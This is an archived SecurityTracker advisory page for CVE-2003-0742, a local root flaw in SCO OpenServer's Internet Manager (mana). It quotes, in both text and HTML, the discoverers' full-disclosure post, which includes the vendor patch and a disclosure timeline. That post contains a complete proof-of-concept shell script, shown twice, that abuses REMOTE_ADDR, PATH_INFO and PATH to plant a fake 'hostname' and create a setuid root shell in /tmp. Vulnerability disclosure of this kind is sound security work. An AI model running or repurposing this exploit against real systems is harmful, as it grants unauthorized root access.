SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Internet Manager (mana) Vendors:   Santa Cruz Operations
SCO Internet Manager (mana) Environment Variable Validation Flaw Lets Local Users Grab Root Privileges
SecurityTracker Alert ID:  1007703
SecurityTracker URL:  http://securitytracker.com/id/1007703
CVE Reference:   CVE-2003-0742   (Links to External Site)
Updated:  Sep 16 2003
Original Entry Date:  Sep 15 2003
Impact:   Execution of arbitrary code via local system, Root access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability was reported in the Internet Manager (mana) application for SCO UNIX. A local user can obtain root privileges on the system.

Texonet issued an advisory warning that a local user can set the REMOTE_ADDR environment variable to '127.0.0.1' and then run '/usr/internet/admin/mana/mana' to cause the application to execute the 'menu.mana' file without requiring authentication.

The advisory also indicates that a local user can set the PATH_INFO to '/pass-err.mana' and the PATH to './:$PATH' to cause would make mana to execute the './hostname' file with root privileges.

A demonstration exploit is provided in the Source Message.

Impact:   A local user can cause 'mana' to execute arbitrary code with root level privileges.
Solution:   According to the report, the following vendor-supplied package fixes the flaw:

ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19

Vendor URL:  www.sco.com/ (Links to External Site)
Cause:   Authentication error, Input validation error
Underlying OS:  UNIX (Open UNIX-SCO)
Underlying OS Comments:  5.0.5 - 5.0.7

Message History:   This archive entry has one or more follow-up message(s) listed below.
Sep 16 2003 (Vendor Issues Fix) Re: SCO Internet Manager (mana) Environment Variable Validation Flaw Lets Local Users Grab Root Privileges
SCO has issued a fix.



 Source Message Contents

Subject:  [Full-Disclosure] SCO internet manager local root.


This is a multi-part message in MIME format.

------=_NextPart_000_0066_01C37B84.BB6A47F0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

-----------------------------------------------------------------------
Texonet Security Advisory 20030902
-----------------------------------------------------------------------
Advisory ID    : TEXONET-20030902
Authors        : Joel Soderberg and Christer Oberg
Issue date     : Tuesday, September 02, 2003
Publish date   : Monday, September 15, 2003
Application    : SCO OpenServer / Internet Manager (mana)
Version(s)     : 5.0.5 - 5.0.7
Platforms      : OpenServer
Availability   : http://www.texonet.com/advisories/TEXONET-20030902.txt
-----------------------------------------------------------------------


Problem:
-----------------------------------------------------------------------
A vulnerability in SCO Internet Manager (mana) program for OpenServer
(SCO Unix) that lets local users gain root level privileges.


Description:
-----------------------------------------------------------------------
Short description from SCO: "SCO Internet Manager - allowing users to
easily configure and manage Internet and intranet servers."

The SCO Internet Manager (mana) is designed to be run via the=20
ncsa_httpd on port 615 and it is password protected.

Running /usr/internet/admin/mana/mana locally is however possible.

By exporting the environment variable REMOTE_ADDR and setting it to
127.0.0.1 mana is tricked to execute the file menu.mana as if it was=20
run via the nsca_httpd password protected area.

An other interesting environment variable is PATH_INFO which tells mana
what .mana file should be run.

The file pass-err.mana contains the following lines:

  <TCL>
  if {[catch {exec hostname} hostName] !=3D 0} {
      set hostName localhost
  }
  set mana(localHostName) $hostName
  return {}
  </TCL>

This tells us that mana will execute "hostname" when this file is run.

By changing the environment variables PATH_INFO to /pass-err.mana and
PATH to ./:$PATH would make mana execute ./hostname with root
privileges.


Example (Simple POC):

This proof of concept for OpenServer 5.0.7 should give any local user
euid=3D0(root).


$ uname -a
SCO_SV openserv 3.2 5.0.7 i386
$ id
uid=3D200(test) gid=3D50(group) groups=3D50(group)
$ sh mana-root.sh
# id
uid=3D200(test) gid=3D50(group) euid=3D0(root) groups=3D50(group)


- Code Start -
mana-root.sh
----------------------------C-U-T---H-E-R-E----------------------------
#!/bin/sh
#
# OpenServer 5.0.7 - Local mana root shell
#
#

REMOTE_ADDR=3D127.0.0.1
PATH_INFO=3D/pass-err.mana
PATH=3D./:$PATH

export REMOTE_ADDR
export PATH_INFO
export PATH

echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname

chmod 755 hostname

/usr/internet/admin/mana/mana > /dev/null

/tmp/sh

----------------------------C-U-T---H-E-R-E----------------------------
- Code End -


Workaround:
-----------------------------------------------------------------------
The proper solution is to install the latest packages.

Location of Fixed Binaries

ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19


Verification

MD5 (VOL.000.000) =3D 37b55df2c9000c703a22baafbe9cef42

md5 is available for download from ftp://ftp.sco.com/pub/security/tools


Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

1) Download the VOL* files to the /tmp directory

2) Run the custom command, specify an install from media images, and=20
   specify the /tmp directory as the location of the images.


Disclosure Timeline:
-----------------------------------------------------------------------
9/02/2003: Vendor notified by e-mail
9/03/2003: Vendor has verified the issue and is working on the solution
9/15/2003: Public release


About Texonet:
-----------------------------------------------------------------------
Texonet is a Swedish based security company with a focus on penetration
testing / security assessments, research and development.


Contacting Texonet:
-----------------------------------------------------------------------
E-mail:    advisories(-at-)texonet.com
Homepage:  http://www.texonet.com/
Phone:     +46-8-55174611


------=_NextPart_000_0066_01C37B84.BB6A47F0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2800.1226" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><PRE>---------------------------------------------------------------=
--------
Texonet Security Advisory 20030902
-----------------------------------------------------------------------
Advisory ID    : TEXONET-20030902
Authors        : Joel Soderberg and Christer Oberg
Issue date     : Tuesday, September 02, 2003
Publish date   : Monday, September 15, 2003
Application    : SCO OpenServer / Internet Manager (mana)
Version(s)     : 5.0.5 - 5.0.7
Platforms      : OpenServer
Availability   : http://www.texonet.com/advisories/TEXONET-20030902.txt
-----------------------------------------------------------------------


Problem:
-----------------------------------------------------------------------
A vulnerability in SCO Internet Manager (mana) program for OpenServer
(SCO Unix) that lets local users gain root level privileges.


Description:
-----------------------------------------------------------------------
Short description from SCO: "SCO Internet Manager - allowing users to
easily configure and manage Internet and intranet servers."

The SCO Internet Manager (mana) is designed to be run via the=20
ncsa_httpd on port 615 and it is password protected.

Running /usr/internet/admin/mana/mana locally is however possible.

By exporting the environment variable REMOTE_ADDR and setting it to
127.0.0.1 mana is tricked to execute the file menu.mana as if it was=20
run via the nsca_httpd password protected area.

An other interesting environment variable is PATH_INFO which tells mana
what .mana file should be run.

The file pass-err.mana contains the following lines:

  &lt;TCL&gt;
  if {[catch {exec hostname} hostName] !=3D 0} {
      set hostName localhost
  }
  set mana(localHostName) $hostName
  return {}
  &lt;/TCL&gt;

This tells us that mana will execute "hostname" when this file is run.

By changing the environment variables PATH_INFO to /pass-err.mana and
PATH to ./:$PATH would make mana execute ./hostname with root
privileges.


Example (Simple POC):

This proof of concept for OpenServer 5.0.7 should give any local user
euid=3D0(root).


$ uname -a
SCO_SV openserv 3.2 5.0.7 i386
$ id
uid=3D200(test) gid=3D50(group) groups=3D50(group)
$ sh mana-root.sh
# id
uid=3D200(test) gid=3D50(group) euid=3D0(root) groups=3D50(group)


- Code Start -
mana-root.sh
----------------------------C-U-T---H-E-R-E----------------------------
#!/bin/sh
#
# OpenServer 5.0.7 - Local mana root shell
#
#

REMOTE_ADDR=3D127.0.0.1
PATH_INFO=3D/pass-err.mana
PATH=3D./:$PATH

export REMOTE_ADDR
export PATH_INFO
export PATH

echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" &gt; hostname

chmod 755 hostname

/usr/internet/admin/mana/mana &gt; /dev/null

/tmp/sh

----------------------------C-U-T---H-E-R-E----------------------------
- Code End =96


Workaround:
-----------------------------------------------------------------------
The proper solution is to install the latest packages.

Location of Fixed Binaries

ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19


Verification

MD5 (VOL.000.000) =3D 37b55df2c9000c703a22baafbe9cef42

md5 is available for download from ftp://ftp.sco.com/pub/security/tools


Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

1) Download the VOL* files to the /tmp directory

2) Run the custom command, specify an install from media images, and=20
   specify the /tmp directory as the location of the images.


Disclosure Timeline:
-----------------------------------------------------------------------
9/02/2003: Vendor notified by e-mail
9/03/2003: Vendor has verified the issue and is working on the solution
9/15/2003: Public release


About Texonet:
-----------------------------------------------------------------------
Texonet is a Swedish based security company with a focus on penetration
testing / security assessments, research and development.


Contacting Texonet:
-----------------------------------------------------------------------
E-mail:    advisories(-at-)texonet.com
Homepage:  http://www.texonet.com/
Phone:     +46-8-55174611

</PRE></DIV></BODY></HTML>

------=_NextPart_000_0066_01C37B84.BB6A47F0--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC